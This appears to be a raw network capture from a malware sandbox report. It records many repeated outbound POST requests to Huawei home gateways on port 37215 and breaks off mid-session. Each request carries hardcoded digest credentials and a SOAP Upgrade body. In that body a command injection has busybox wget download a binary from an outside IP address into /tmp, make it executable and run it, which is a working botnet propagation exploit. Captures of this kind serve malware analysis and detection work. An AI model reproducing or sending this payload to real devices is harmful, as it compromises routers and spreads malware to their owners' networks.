                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1886192.168.2.155597841.141.183.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599488020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1887192.168.2.154293441.107.78.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599510908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1888192.168.2.155841841.77.166.24037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599510908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1889192.168.2.154925441.82.25.11537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599529982 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1890192.168.2.154735641.75.224.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599555016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1891192.168.2.154931841.181.180.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599569082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1892192.168.2.153315641.169.73.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599598885 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1893192.168.2.154048441.104.240.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599622965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1894192.168.2.153562641.251.122.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599639893 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1895192.168.2.154886641.175.201.12537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599649906 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
